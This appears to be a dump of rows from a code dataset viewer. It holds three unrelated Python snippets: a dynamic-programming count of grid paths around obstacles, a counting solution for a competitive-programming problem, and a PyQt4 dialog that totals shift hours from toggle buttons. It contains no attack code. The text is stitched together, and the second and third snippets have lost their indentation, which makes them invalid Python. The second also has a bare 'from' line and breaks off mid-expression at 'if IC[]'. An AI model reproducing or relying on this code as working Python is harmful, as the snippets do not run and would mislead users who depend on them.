    programming over per-cell path counts."""
    rows, cols = len(grid), len(grid[0])
    paths = [[0] * cols for _ in range(rows)]
    # Sweep top-to-bottom, left-to-right.
    for r in range(rows):
        for c in range(cols):
            # A cell holding an obstacle keeps a path count of 0.
            if grid[r][c]:
                continue
            if r == 0 and c == 0:
                paths[r][c] = 1
            else:
                from_above = paths[r - 1][c] if r != 0 else 0
                from_left = paths[r][c - 1] if c != 0 else 0
                paths[r][c] = from_above + from_left
    print(paths[-1][-1])  # kept: the original also prints the answer
    return paths[-1][-1]
unique_paths_with_obstacles([[0,0,0],[0,1,0],[0,0,0]]) |
from
Q = 10**9+7
N, M = map( int, input().split())
A = list( map( int, input().split()))
B = list( map( int, input().split()))
G = [(0,0)]*N
R = [(0,0)]*M
for i, m in enumerate(A):
G[i] = (m,i)
for j, m in enumerate(B):
R[j] = (m,j)
G.sort()
R.sort()
ans = 1
A.sort()
B.sort()
for i in range(N):
if A[i] < M*i:
ans = 0
break
for j in range(M):
if B[j] < N*j:
ans = 0
break
IC = [0]*N
JC = [0]*N
cnt = 0
for m in range(M*N,-1,-1):
g, i = G[0]
r, j = R[0]
if m == g and m == r:
G.pop(0)
R.pop(0)
IC[i] = 1
JC[i] = 1
elif m == g:
if IC[]
|
from PyQt4 import QtGui
from TimePad import Ui_Dialog
import ShiftPopUp
class TimePadPopUp(QtGui.QDialog):
a = float() # Total hours counter variable
#sender = str()
def __init__(self, StAM, FinAM, BrkAM, StPM, FinPM, BrkPM):
super(TimePadPopUp, self).__init__()
QtGui.QWidget.__init__(self)
self.uip = Ui_Dialog()
self.uip.setupUi(self)
self.StAM = StAM
self.FinAM = FinAM
self.BrkAM = BrkAM
self.StPM = StPM
self.FinPM = FinPM
self.BrkPM = BrkPM
# 0 the total hours counter variable 'a'
TimePadPopUp.a = + 0
# Connect all buttons to modules
self.uip.pushButton1.clicked.connect(self.Button1)
self.uip.pushButton2.clicked.connect(self.Button2)
self.uip.pushButton3.clicked.connect(self.Button3)
self.uip.pushButton4.clicked.connect(self.Button4)
self.uip.pushButton5.clicked.connect(self.Button5)
self.uip.pushButton6.clicked.connect(self.Button6)
self.uip.pushButton7.clicked.connect(self.Button7)
self.uip.pushButton8.clicked.connect(self.Button8)
self.uip.pushButton9.clicked.connect(self.Button9)
self.uip.pushButton10.clicked.connect(self.Button10)
self.uip.pushButton11.clicked.connect(self.Button11)
self.uip.pushButton12.clicked.connect(self.Button12)
self.uip.pushButton13.clicked.connect(self.Button13)
self.uip.pushButton14.clicked.connect(self.Button14)
self.uip.pushButton15.clicked.connect(self.Button15)
self.uip.pushButton16.clicked.connect(self.Button16)
self.uip.pushButton17.clicked.connect(self.Button17)
self.uip.pushButton18.clicked.connect(self.Button18)
self.uip.pushButton19.clicked.connect(self.Button19)
self.uip.pushButton20.clicked.connect(self.Button20)
self.uip.pushButton21.clicked.connect(self.Button21)
self.uip.pushButton22.clicked.connect(self.Button22)
self.uip.pushButton23.clicked.connect(self.Button23)
self.uip.pushButton24.clicked.connect(self.Button24)
self.uip.pushButton25.clicked.connect(self.Button25)
self.uip.pushButton26.clicked.connect(self.Button26)
self.uip.pushButton0000.clicked.connect(self.Button0000)
self.uip.pushButton0015.clicked.connect(self.Button0015)
self.uip.pushButton0030.clicked.connect(self.Button0030)
self.uip.pushButton0045.clicked.connect(self.Button0045)
self.uip.pushButtonCLR.clicked.connect(self.ButtonCLR)
def ButtonCLR(self):
self.sender = ShiftPopUp.ShiftPopUp.senderBUT
# Use the passed button sender information from ShiftPopUp.TimePadPopUp to assign date to relevant variable
if str(self.sender[0:-3]) == "StAM":
self.StAM = 0
elif str(self.sender[0:-3]) == "FinAM":
self.FinAM = 0
elif str(self.sender[0:-3]) == "BrkAM":
self.BrkAM = 0
elif str(self.sender[0:-3]) == "StPM":
self.StPM = 0
elif str(self.sender[0:-3]) == "FinPM":
self.FinPM = 0
elif str(self.sender[0:-3]) == "BrkPM":
self.BrkPM = 0
def Button1(self):
if self.uip.pushButton1.isChecked() is True: # If button is checked increase counter by 1
TimePadPopUp.a = TimePadPopUp.a + 1
elif self.uip.pushButton1.isChecked() is False: # If button is unchecked decrease counter by 1
TimePadPopUp.a = TimePadPopUp.a - 1
print(TimePadPopUp.a)
def Button2(self):
if self.uip.pushButton2.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 2
elif self.uip.pushButton2.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 2
print(TimePadPopUp.a)
def Button3(self):
if self.uip.pushButton3.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 3
elif self.uip.pushButton3.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 3
print(TimePadPopUp.a)
def Button4(self):
if self.uip.pushButton4.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 4
elif self.uip.pushButton4.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 4
print(TimePadPopUp.a)
def Button5(self):
if self.uip.pushButton5.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 5
elif self.uip.pushButton5.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 5
print(TimePadPopUp.a)
def Button6(self):
if self.uip.pushButton6.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 6
elif self.uip.pushButton6.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 6
print(TimePadPopUp.a)
def Button7(self):
if self.uip.pushButton7.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 7
elif self.uip.pushButton7.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 7
print(TimePadPopUp.a)
def Button8(self):
if self.uip.pushButton8.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 8
elif self.uip.pushButton8.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 8
print(TimePadPopUp.a)
def Button9(self):
if self.uip.pushButton9.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 9
elif self.uip.pushButton9.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 9
print(TimePadPopUp.a)
def Button10(self):
if self.uip.pushButton10.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 10
elif self.uip.pushButton10.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 10
print(TimePadPopUp.a)
def Button11(self):
if self.uip.pushButton11.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 11
elif self.uip.pushButton11.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 11
print(TimePadPopUp.a)
def Button12(self):
if self.uip.pushButton12.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 12
elif self.uip.pushButton12.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 12
print(TimePadPopUp.a)
def Button13(self):
if self.uip.pushButton13.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 13
elif self.uip.pushButton13.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 13
print(TimePadPopUp.a)
def Button14(self):
if self.uip.pushButton14.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 14
elif self.uip.pushButton14.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 14
print(TimePadPopUp.a)
def Button15(self):
if self.uip.pushButton15.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 15
elif self.uip.pushButton15.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 15
print(TimePadPopUp.a)
def Button16(self):
if self.uip.pushButton16.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 16
elif self.uip.pushButton16.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 16
print(TimePadPopUp.a)
def Button17(self):
if self.uip.pushButton17.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 17
elif self.uip.pushButton17.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 17
print(TimePadPopUp.a)
def Button18(self):
if self.uip.pushButton18.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 18
elif self.uip.pushButton18.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 18
print(TimePadPopUp.a)
def Button19(self):
if self.uip.pushButton19.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 19
elif self.uip.pushButton19.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 19
print(TimePadPopUp.a)
def Button20(self):
if self.uip.pushButton20.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 20
elif self.uip.pushButton20.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 20
print(TimePadPopUp.a)
def Button21(self):
if self.uip.pushButton21.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 21
elif self.uip.pushButton21.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 21
print(TimePadPopUp.a)
def Button22(self):
if self.uip.pushButton22.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 22
elif self.uip.pushButton22.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 22
print(TimePadPopUp.a)
def Button23(self):
if self.uip.pushButton23.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 23
elif self.uip.pushButton23.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 23
print(TimePadPopUp.a)
def Button24(self):
if self.uip.pushButton24.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 24
elif self.uip.pushButton24.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 24
print(TimePadPopUp.a)
def Button25(self):
if self.uip.pushButton25.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 25
elif self.uip.pushButton25.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 25
print(TimePadPopUp.a)
def Button26(self):
if self.uip.pushButton26.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 26
elif self.uip.pushButton26.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 26
print(TimePadPopUp.a)
def Button0015(self):
if self.uip.pushButton0015.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 0.25
elif self.uip.pushButton0015.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 0.25
print(TimePadPopUp.a)
def Button0030(self):
if self.uip.pushButton0030.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 0.5
elif self.uip.pushButton0030.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 0.5
print(TimePadPopUp.a)
def Button0045(self):
if self.uip.pushButton0045.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 0.75
elif self.uip.pushButton0045.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 0.75
print(TimePadPopUp.a)
def Button0000(self):
if self.uip.pushButton0000.isChecked() is True:
TimePadPopUp.a = TimePadPopUp.a + 0.0
elif self.uip.pushButton0000.isChecked() is False:
TimePadPopUp.a = TimePadPopUp.a - 0.0
print(TimePadPopUp.a) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.